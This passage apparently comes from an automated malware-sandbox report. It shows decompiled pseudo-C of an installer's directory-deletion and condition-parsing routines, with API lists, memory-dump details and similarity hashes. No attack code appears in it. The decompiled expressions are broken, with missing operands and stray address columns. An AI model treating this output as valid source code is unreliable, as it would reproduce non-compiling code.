                                                                                                                                                                  									}
                                                                                                                                                                  									_t97 = GetLastError();
                                                                                                                                                                  									__eflags = _t97;
                                                                                                                                                                  									_t137 =  <=  ? _t97 : _t97 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eflags = _t137 - 0x80070020;
                                                                                                                                                                  									if(_t137 != 0x80070020) {
                                                                                                                                                                  										L43:
                                                                                                                                                                  										__eflags = _t137;
                                                                                                                                                                  										if(_t137 >= 0) {
                                                                                                                                                                  											goto L51;
                                                                                                                                                                  										}
                                                                                                                                                                  										L44:
                                                                                                                                                                  										_push(_t137);
                                                                                                                                                                  										_push(0x14c);
                                                                                                                                                                  										goto L45;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _v1652;
                                                                                                                                                                  									if(_v1652 == 0) {
                                                                                                                                                                  										goto L44;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t97 = MoveFileExW(_t128, 0, 4);
                                                                                                                                                                  									__eflags = _t97;
                                                                                                                                                                  									if(_t97 == 0) {
                                                                                                                                                                  										goto L44;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t137 = 0;
                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                  									goto L43;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t115 = GetLastError();
                                                                                                                                                                  								__eflags = _t115;
                                                                                                                                                                  								_t155 =  <=  ? _t115 : _t115 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t116 = 0x80004005;
                                                                                                                                                                  								__eflags = _t155;
                                                                                                                                                                  								_t137 =  >=  ? 0x80004005 : _t155;
                                                                                                                                                                  								_push( >=  ? 0x80004005 : _t155);
                                                                                                                                                                  								_push(0xf2);
                                                                                                                                                                  								L3:
                                                                                                                                                                  								_push("dirutil.cpp");
                                                                                                                                                                  								E004300D9(_t116);
                                                                                                                                                                  								goto L53;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t119 = GetTempPathW(0x104,  &_v1048);
                                                                                                                                                                  							__eflags = _t119;
                                                                                                                                                                  							if(_t119 != 0) {
                                                                                                                                                                  								goto L13;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t120 = GetLastError();
                                                                                                                                                                  							__eflags = _t120;
                                                                                                                                                                  							_t158 =  <=  ? _t120 : _t120 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							_t116 = 0x80004005;
                                                                                                                                                                  							__eflags = _t158;
                                                                                                                                                                  							_t137 =  >=  ? 0x80004005 : _t158;
                                                                                                                                                                  							_push( >=  ? 0x80004005 : _t158);
                                                                                                                                                                  							_push(0xe7);
                                                                                                                                                                  							goto L3;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags = _v1664;
                                                                                                                                                                  						if(_v1664 == 0) {
                                                                                                                                                                  							goto L38;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t121 = SetFileAttributesW(_t126, 0x80);
                                                                                                                                                                  					__eflags = _t121;
                                                                                                                                                                  					if(_t121 != 0) {
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t122 = GetLastError();
                                                                                                                                                                  					__eflags = _t122;
                                                                                                                                                                  					_t161 =  <=  ? _t122 : _t122 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					_t116 = 0x80004005;
                                                                                                                                                                  					__eflags = _t161;
                                                                                                                                                                  					_t137 =  >=  ? 0x80004005 : _t161;
                                                                                                                                                                  					_push( >=  ? 0x80004005 : _t161);
                                                                                                                                                                  					_push(0xdc);
                                                                                                                                                                  					goto L3;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t123 = GetLastError();
                                                                                                                                                                  				_t133 = 3;
                                                                                                                                                                  				_t116 =  ==  ? _t133 : _t123;
                                                                                                                                                                  				_t137 =  <=  ?  ==  ? _t133 : _t123 : ( ==  ? _t133 : _t123) & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				if(_t137 >= 0) {
                                                                                                                                                                  					goto L4;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_t137);
                                                                                                                                                                  				_push(0xd3);
                                                                                                                                                                  				goto L3;
                                                                                                                                                                  			}



























































                                                                                                                                                                  0x0043759c
                                                                                                                                                                  0x0043759e
                                                                                                                                                                  0x004375a4
                                                                                                                                                                  0x004375a7
                                                                                                                                                                  0x004375ce
                                                                                                                                                                  0x004375d0
                                                                                                                                                                  0x004375d1
                                                                                                                                                                  0x004375d8
                                                                                                                                                                  0x004375ff
                                                                                                                                                                  0x00437601
                                                                                                                                                                  0x00437621
                                                                                                                                                                  0x00437623
                                                                                                                                                                  0x00437625
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043762b
                                                                                                                                                                  0x00437632
                                                                                                                                                                  0x00437638
                                                                                                                                                                  0x00437667
                                                                                                                                                                  0x00437667
                                                                                                                                                                  0x0043766e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437674
                                                                                                                                                                  0x00437676
                                                                                                                                                                  0x00437691
                                                                                                                                                                  0x00437697
                                                                                                                                                                  0x0043769d
                                                                                                                                                                  0x0043769f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004376a1
                                                                                                                                                                  0x004376a7
                                                                                                                                                                  0x004377cb
                                                                                                                                                                  0x004377d6
                                                                                                                                                                  0x004377d8
                                                                                                                                                                  0x004377db
                                                                                                                                                                  0x004377e0
                                                                                                                                                                  0x004377e2
                                                                                                                                                                  0x004377e5
                                                                                                                                                                  0x004377e6
                                                                                                                                                                  0x00437778
                                                                                                                                                                  0x00437778
                                                                                                                                                                  0x0043777d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043777d
                                                                                                                                                                  0x004376c2
                                                                                                                                                                  0x004376c8
                                                                                                                                                                  0x004376ca
                                                                                                                                                                  0x004377a9
                                                                                                                                                                  0x004377b4
                                                                                                                                                                  0x004377b6
                                                                                                                                                                  0x004377b9
                                                                                                                                                                  0x004377be
                                                                                                                                                                  0x004377c0
                                                                                                                                                                  0x004377c3
                                                                                                                                                                  0x004377c4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004377c4
                                                                                                                                                                  0x004376e5
                                                                                                                                                                  0x004376e7
                                                                                                                                                                  0x004376e9
                                                                                                                                                                  0x004376eb
                                                                                                                                                                  0x004376ed
                                                                                                                                                                  0x004376f8
                                                                                                                                                                  0x004376ef
                                                                                                                                                                  0x004376f5
                                                                                                                                                                  0x004376f5
                                                                                                                                                                  0x004376fe
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004376fe
                                                                                                                                                                  0x00437683
                                                                                                                                                                  0x00437689
                                                                                                                                                                  0x0043768b
                                                                                                                                                                  0x00437787
                                                                                                                                                                  0x00437792
                                                                                                                                                                  0x00437794
                                                                                                                                                                  0x00437797
                                                                                                                                                                  0x0043779c
                                                                                                                                                                  0x0043779e
                                                                                                                                                                  0x004377a1
                                                                                                                                                                  0x004377a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004377a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043768b
                                                                                                                                                                  0x0043763a
                                                                                                                                                                  0x0043763c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437645
                                                                                                                                                                  0x0043764a
                                                                                                                                                                  0x0043764c
                                                                                                                                                                  0x0043764e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043765d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043765d
                                                                                                                                                                  0x004375dc
                                                                                                                                                                  0x004375e3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004375e9
                                                                                                                                                                  0x004375f0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004375f2
                                                                                                                                                                  0x004375f9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437700
                                                                                                                                                                  0x00437708
                                                                                                                                                                  0x0043770e
                                                                                                                                                                  0x0043770e
                                                                                                                                                                  0x00437716
                                                                                                                                                                  0x00437718
                                                                                                                                                                  0x0043771b
                                                                                                                                                                  0x004377ed
                                                                                                                                                                  0x004377f8
                                                                                                                                                                  0x004377fa
                                                                                                                                                                  0x004377fd
                                                                                                                                                                  0x00437802
                                                                                                                                                                  0x00437804
                                                                                                                                                                  0x00437807
                                                                                                                                                                  0x00437808
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437808
                                                                                                                                                                  0x00437721
                                                                                                                                                                  0x00437721
                                                                                                                                                                  0x00437723
                                                                                                                                                                  0x00437723
                                                                                                                                                                  0x0043772a
                                                                                                                                                                  0x00437730
                                                                                                                                                                  0x00437732
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437738
                                                                                                                                                                  0x00437743
                                                                                                                                                                  0x00437745
                                                                                                                                                                  0x00437748
                                                                                                                                                                  0x0043774e
                                                                                                                                                                  0x0043776a
                                                                                                                                                                  0x0043776a
                                                                                                                                                                  0x0043776c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437772
                                                                                                                                                                  0x00437772
                                                                                                                                                                  0x00437773
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00437773
                                                                                                                                                                  0x00437750
                                                                                                                                                                  0x00437757
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043775e
                                                                                                                                                                  0x00437764
                                                                                                                                                                  0x00437766
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(004125A6,?,?,?,00000001,80004005,00000000), ref: 00437488
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 0043749B
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000001,80004005,00000000), ref: 004374E7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004374F1
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,00000001,80004005,00000000), ref: 0043753E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437548
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,?,00000001,80004005,00000000), ref: 00437596
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004375A9
                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00000001,80004005,00000000), ref: 00437683
                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00000001,80004005,00000000), ref: 00437697
                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,00000001,80004005,00000000), ref: 004376C2
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,?,00000001,?,?,?,00000001,80004005,00000000), ref: 004376E5
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,80004005,00000000), ref: 004376FE
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,80004005,00000000), ref: 00437708
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437716
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,?,00000001,80004005,00000000), ref: 0043772A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437738
                                                                                                                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,00000001,80004005,00000000), ref: 0043775E
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 00437787
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004377A9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004377CB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 004377ED
                                                                                                                                                                  • FindClose.KERNEL32(000000FF,?,?,?,00000001,80004005,00000000), ref: 00437823
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$AttributesFindMove$Temp$CloseDeleteDirectoryFirstNameNextPathRemove
                                                                                                                                                                  • String ID: *.*$DEL$dirutil.cpp
                                                                                                                                                                  • API String ID: 1544372074-1252831301
                                                                                                                                                                  • Opcode ID: ff15a5ff8e6dd2613c8f2ac8fd9824e12e9b0305dd7ddf123cd3d42f7810a1dd
                                                                                                                                                                  • Instruction ID: f4a30c99753e662d69791e8fe703a85e964cd615430bb2bb27ab4dbbde91187f
                                                                                                                                                                  • Opcode Fuzzy Hash: ff15a5ff8e6dd2613c8f2ac8fd9824e12e9b0305dd7ddf123cd3d42f7810a1dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FA1FCB1D05334AAEB3096758C44BEBB6E9EF48750F011267ED48F7290D7399D41CAE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E004050BA(void* __eflags, signed int _a4) {
                                                                                                                                                                  				short _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				signed int _t131;
                                                                                                                                                                  				void* _t132;
                                                                                                                                                                  				void* _t136;
                                                                                                                                                                  				void* _t138;
                                                                                                                                                                  				void* _t139;
                                                                                                                                                                  				void* _t143;
                                                                                                                                                                  				void* _t145;
                                                                                                                                                                  				void* _t146;
                                                                                                                                                                  				void* _t148;
                                                                                                                                                                  				void* _t151;
                                                                                                                                                                  				void* _t152;
                                                                                                                                                                  				signed int _t157;
                                                                                                                                                                  				int _t160;
                                                                                                                                                                  				signed int _t166;
                                                                                                                                                                  				short* _t178;
                                                                                                                                                                  				int _t182;
                                                                                                                                                                  				short* _t184;
                                                                                                                                                                  				void* _t199;
                                                                                                                                                                  				void* _t200;
                                                                                                                                                                  				signed int _t202;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  				signed short* _t204;
                                                                                                                                                                  				void* _t209;
                                                                                                                                                                  				signed int _t214;
                                                                                                                                                                  				signed int _t215;
                                                                                                                                                                  				signed short* _t218;
                                                                                                                                                                  				signed int _t219;
                                                                                                                                                                  				void* _t222;
                                                                                                                                                                  				void _t224;
                                                                                                                                                                  				void* _t225;
                                                                                                                                                                  				void* _t228;
                                                                                                                                                                  				void* _t230;
                                                                                                                                                                  				signed int _t235;
                                                                                                                                                                  				void* _t237;
                                                                                                                                                                  				void* _t238;
                                                                                                                                                                  				void* _t240;
                                                                                                                                                                  				int _t241;
                                                                                                                                                                  				signed int _t242;
                                                                                                                                                                  				void* _t251;
                                                                                                                                                                  
                                                                                                                                                                  				_t214 = _a4;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t241 = 0;
                                                                                                                                                                  				_t3 = _t214 + 0x18; // 0x4059ae
                                                                                                                                                                  				E00418E52(_t3);
                                                                                                                                                                  				_t4 = _t214 + 0x10; // 0x4059a6
                                                                                                                                                                  				_t228 = _t4;
                                                                                                                                                                  				_t215 = 6;
                                                                                                                                                                  				memset(_t228, 0, _t215 << 2);
                                                                                                                                                                  				_t6 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  				if(0 !=  *((intOrPtr*)( *_t6))) {
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t8 = _t214 + 8; // 0xeb0043d5
						GetStringTypeW(1,  *_t8, 1,  &_v8);
						if((_v8 & 0x00000040) == 0) {
							break;
						}
						 *(_t214 + 8) =  &(( *(_t214 + 8))[1]);
						_t14 = _t214 + 8; // 0xeb0043d5
						if(0 !=  *((intOrPtr*)( *_t14))) {
							continue;
						}
						break;
					}
					_t15 = _t214 + 0x10; // 0x4059a6
					_t228 = _t15;
				}
				_t16 = _t214 + 8; // 0xeb0043d5
				_t218 =  *_t16;
				_t17 = _t214 + 4; // 0x54680779
				_v12 = _t218 -  *_t17 >> 1;
				_t131 =  *_t218 & 0x0000ffff;
				_t251 = _t131 - 0x3c;
				if(_t251 > 0) {
					_t132 = _t131 - 0x3d;
					if(_t132 == 0) {
						 *_t228 = 0x10009;
						goto L23;
					} else {
						_t136 = _t132 - 1;
						if(_t136 == 0) {
							_t138 = (_t218[1] & 0x0000ffff) - 0x3c;
							if(_t138 == 0) {
								 *_t228 = 0x1000b;
								goto L103;
							} else {
								_t139 = _t138 - 1;
								if(_t139 == 0) {
									 *_t228 = 0x10008;
									goto L103;
								} else {
									if(_t139 == 1) {
										 *_t228 = 0x1000d;
										goto L103;
									} else {
										 *_t228 = 0x10006;
										goto L23;
									}
								}
							}
						} else {
							if(_t136 == 0x40) {
								_t143 = (_t218[1] & 0x0000ffff) - 0x3c;
								if(_t143 == 0) {
									_t145 = (_t218[2] & 0x0000ffff) - 0x3c;
									if(_t145 == 0) {
										 *_t228 = 0x3000c;
										goto L93;
									} else {
										_t146 = _t145 - 1;
										if(_t146 == 0) {
											 *_t228 = 0x30007;
											goto L93;
										} else {
											_t235 = 0;
											if(_t146 == 1) {
												 *_t228 = 0x3000a;
												goto L89;
											} else {
												 *_t228 = 0x30005;
												goto L87;
											}
											goto L90;
										}
									}
									goto L106;
								} else {
									_t148 = _t143 - 1;
									if(_t148 == 0) {
										 *_t228 = 0x30009;
										goto L103;
									} else {
										_t149 = _t148 == 1;
										if(_t148 == 1) {
											_t151 = (_t218[2] & 0x0000ffff) - 0x3c;
											if(_t151 == 0) {
												 *_t228 = 0x3000b;
												goto L93;
											} else {
												_t152 = _t151 - 1;
												if(_t152 == 0) {
													 *_t228 = 0x30008;
													L93:
													_push(3);
													goto L94;
												} else {
													_t235 = 0;
													if(_t152 == 1) {
														 *_t228 = 0x3000d;
														L89:
														_push(3);
													} else {
														 *_t228 = 0x30006;
														L87:
														_push(2);
													}
													L90:
													_pop(_t241);
												}
											}
											goto L106;
										} else {
											_t242 = 0x8007000d;
											 *(_t214 + 0x28) = 1;
											_t235 = 0x8007000d;
											E004300D9(_t149, "condition.cpp", 0x237, 0x8007000d);
											_push(_v12);
											_t112 = _t214 + 4; // 0x54680779
											_push( *_t112);
											_push("Failed to parse condition \"%ls\". Unexpected \'~\' operator at position %d.");
											goto L36;
										}
									}
								}
							} else {
								goto L31;
							}
						}
					}
				} else {
					if(_t251 == 0) {
						_t199 = (_t218[1] & 0x0000ffff) - 0x3c;
						if(_t199 == 0) {
							 *_t228 = 0x1000c;
							goto L103;
						} else {
							_t200 = _t199 - 1;
							if(_t200 == 0) {
								 *_t228 = 0x10007;
								goto L103;
							} else {
								if(_t200 == 1) {
									 *_t228 = 0x1000a;
									L103:
									_push(2);
									L94:
									_pop(_t241);
								} else {
									 *_t228 = 0x10005;
									L23:
									_t241 = 1;
								}
							}
						}
						_t235 = 0;
						goto L106;
					} else {
						_t235 = 0;
						_t202 = _t131;
						if(_t202 == 0) {
							 *_t228 = 1;
							goto L106;
						} else {
							_v16 = 0x22;
							_t203 = _t202 - 0x22;
							if(_t203 == 0) {
								_t204 = _t218;
								while(1) {
									_a4 = _a4 & 0x00000000;
									_t204 =  &(_t204[1]);
									_t241 = _t241 + 1;
									_t235 =  *_t204 & 0x0000ffff;
									if(_a4 == _t235) {
										break;
									}
									if(_v16 != _t235) {
										continue;
									} else {
										_t241 = _t241 + 1;
										 *_t228 = 0x12;
										_t25 = _t241 - 2; // 0x0
										_t26 =  &(_t218[1]); // 0xeb0043d7
										goto L60;
									}
									goto L107;
								}
								_t242 = 0x8007000d;
								 *(_t214 + 0x28) = 1;
								_t235 = 0x8007000d;
								E004300D9(_t204, "condition.cpp", 0x277, 0x8007000d);
								_push(_v12);
								_t29 = _t214 + 4; // 0x54680779
								_push( *_t29);
								_push("Failed to parse condition \"%ls\". Unterminated literal at position %d.");
								goto L36;
							} else {
								_t209 = _t203 - 6;
								if(_t209 == 0) {
                                                                                                                                                                  									 *_t228 = 0xe;
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									if(_t209 != 1) {
                                                                                                                                                                  										L31:
                                                                                                                                                                  										_t157 = _v8;
                                                                                                                                                                  										if((_t157 & 0x00000004) != 0) {
                                                                                                                                                                  											L63:
                                                                                                                                                                  											_t237 = 0x5f;
                                                                                                                                                                  											while(1) {
                                                                                                                                                                  												_t241 = _t241 + 1;
                                                                                                                                                                  												_t160 = GetStringTypeW(1,  &(_t218[_t241]), 1,  &_v8);
                                                                                                                                                                  												if((_v8 & 0x00000100) != 0) {
                                                                                                                                                                  													break;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t92 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  												_t218 =  *_t92;
                                                                                                                                                                  												if(_t237 == _t218[_t241]) {
                                                                                                                                                                  													break;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													if((_v8 & 0x00000004) != 0) {
                                                                                                                                                                  														continue;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														asm("xorps xmm0, xmm0");
                                                                                                                                                                  														 *(_t214 + 0x10) = 0x10;
                                                                                                                                                                  														asm("movlpd [ebp-0x10], xmm0");
                                                                                                                                                                  														if(E004345DA(_t218, _t241,  &_v20) >= 0) {
                                                                                                                                                                  															_t104 = _t214 + 0x18; // 0x4059ae
                                                                                                                                                                  															_t166 = E00418D81(_t104, _v20, _v16);
                                                                                                                                                                  															goto L61;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t242 = 0x8007000d;
                                                                                                                                                                  															 *(_t214 + 0x28) = 1;
                                                                                                                                                                  															_t235 = 0x8007000d;
                                                                                                                                                                  															E004300D9(_t164, "condition.cpp", 0x299, 0x8007000d);
                                                                                                                                                                  															_push(_v12);
                                                                                                                                                                  															_t102 = _t214 + 4; // 0x54680779
                                                                                                                                                                  															_push( *_t102);
                                                                                                                                                                  															_push("Failed to parse condition \"%ls\". Constant too big, at position %d.");
                                                                                                                                                                  															goto L36;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  												goto L107;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t242 = 0x8007000d;
                                                                                                                                                                  											 *(_t214 + 0x28) = 1;
                                                                                                                                                                  											_t235 = 0x8007000d;
                                                                                                                                                                  											E004300D9(_t160, "condition.cpp", 0x28c, 0x8007000d);
                                                                                                                                                                  											_push(_v12);
                                                                                                                                                                  											_t108 = _t214 + 4; // 0x54680779
                                                                                                                                                                  											_push( *_t108);
                                                                                                                                                                  											_push("Failed to parse condition \"%ls\". Identifier cannot start at a digit, at position %d.");
                                                                                                                                                                  											goto L36;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_a4 = 0x2d;
                                                                                                                                                                  											if(_a4 == ( *_t218 & 0x0000ffff)) {
                                                                                                                                                                  												goto L63;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t230 = 0x5f;
                                                                                                                                                                  												if((_t157 & 0x00000100) != 0) {
                                                                                                                                                                  													L37:
                                                                                                                                                                  													_t42 =  &(_t218[1]); // 0xeb0043d7
                                                                                                                                                                  													GetStringTypeW(1, _t42, 1,  &_v8);
                                                                                                                                                                  													_t43 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  													_t222 = 0x76;
                                                                                                                                                                  													if(_t222 !=  *((intOrPtr*)( *_t43)) || (_v8 & 0x00000004) == 0) {
                                                                                                                                                                  														_t238 = 0x5f;
                                                                                                                                                                  														goto L48;
                                                                                                                                                                  														do {
                                                                                                                                                                  															do {
                                                                                                                                                                  																L48:
                                                                                                                                                                  																_t66 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  																_t241 = _t241 + 1;
                                                                                                                                                                  																GetStringTypeW(1,  *_t66 + _t241 + _t241, 1,  &_v8);
                                                                                                                                                                  															} while ((_v8 & 0x00000100) != 0 || (_v8 & 0x00000004) != 0);
                                                                                                                                                                  															_t74 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  															_t178 =  *_t74;
                                                                                                                                                                  														} while (_t238 == _t178[_t241]);
                                                                                                                                                                  														_t235 = 0;
                                                                                                                                                                  														if(_t241 != 2) {
                                                                                                                                                                  															if(_t241 != 3) {
                                                                                                                                                                  																goto L59;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																if(CompareStringW(0x7f, 1, _t178, _t241, L"AND", _t241) != 2) {
                                                                                                                                                                  																	_t79 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  																	if(CompareStringW(0x7f, 1,  *_t79, 3, L"NOT", 3) != 2) {
                                                                                                                                                                  																		goto L59;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		 *(_t214 + 0x10) = 4;
                                                                                                                                                                  																		goto L106;
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	 *(_t214 + 0x10) = _t241;
                                                                                                                                                                  																	goto L106;
                                                                                                                                                                  																}
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t182 = CompareStringW(0x7f, 1, _t178, 2, L"OR", 2);
                                                                                                                                                                  															_t224 = 2;
                                                                                                                                                                  															if(_t182 != _t224) {
                                                                                                                                                                  																L59:
                                                                                                                                                                  																_push(_t241);
                                                                                                                                                                  																_t81 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  																_push( *_t81);
                                                                                                                                                                  																 *(_t214 + 0x10) = 0x11;
                                                                                                                                                                  																L60:
                                                                                                                                                                  																_t83 = _t214 + 0x18; // 0x4059ae
                                                                                                                                                                  																_t166 = E00418DBD(_t235);
                                                                                                                                                                  																L61:
                                                                                                                                                                  																_t219 = _t166;
                                                                                                                                                                  																_a4 = _t219;
                                                                                                                                                                  																if(_t219 >= 0) {
                                                                                                                                                                  																	_t235 = _a4;
                                                                                                                                                                  																	goto L106;
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_push("Failed to set symbol value.");
                                                                                                                                                                  																	_push(_t219);
                                                                                                                                                                  																	E00430A57();
                                                                                                                                                                  																	_t235 = _a4;
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																 *(_t214 + 0x10) = _t224;
                                                                                                                                                                  																goto L106;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t240 = 1;
                                                                                                                                                                  														while(1) {
                                                                                                                                                                  															L40:
                                                                                                                                                                  															_t47 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  															_t241 = _t241 + 1;
                                                                                                                                                                  															_t184 =  *_t47 + _t241 * 2;
                                                                                                                                                                  															_t225 = 0x2e;
                                                                                                                                                                  															if(_t225 !=  *_t184) {
                                                                                                                                                                  																break;
                                                                                                                                                                  															}
                                                                                                                                                                  															_t240 = _t240 + 1;
                                                                                                                                                                  															if(_t240 <= 4) {
                                                                                                                                                                  																continue;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t242 = 0x8007000d;
                                                                                                                                                                  																 *(_t214 + 0x28) = 1;
                                                                                                                                                                  																_t235 = 0x8007000d;
                                                                                                                                                                  																E004300D9(_t184, "condition.cpp", 0x2b1, 0x8007000d);
                                                                                                                                                                  																_push(_v12);
                                                                                                                                                                  																_t52 = _t214 + 4; // 0x54680779
                                                                                                                                                                  																_push( *_t52);
                                                                                                                                                                  																_push("Failed to parse condition \"%ls\". Version can have a maximum of 4 parts, at position %d.");
                                                                                                                                                                  																goto L36;
                                                                                                                                                                  															}
                                                                                                                                                                  															goto L107;
                                                                                                                                                                  														}
                                                                                                                                                                  														GetStringTypeW(1, _t184, 1,  &_v8);
                                                                                                                                                                  														if((_v8 & 0x00000004) != 0) {
                                                                                                                                                                  															goto L40;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t57 = _t214 + 0x18; // 0x4059ae
                                                                                                                                                                  															_t58 = _t241 - 1; // 0x0
                                                                                                                                                                  															_t59 = _t214 + 8; // 0xeb0043d5
                                                                                                                                                                  															_t235 = E0043720F(_t230,  *_t59 + 2, _t58, _t57);
                                                                                                                                                                  															if(_t235 >= 0) {
                                                                                                                                                                  																 *(_t214 + 0x20) = 3;
                                                                                                                                                                  																 *(_t214 + 0x10) = 0x13;
                                                                                                                                                                  																goto L106;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t242 = 0x8007000d;
                                                                                                                                                                  																 *(_t214 + 0x28) = 1;
                                                                                                                                                                  																_t235 = 0x8007000d;
                                                                                                                                                                  																E004300D9(_t190, "condition.cpp", 0x2c3, 0x8007000d);
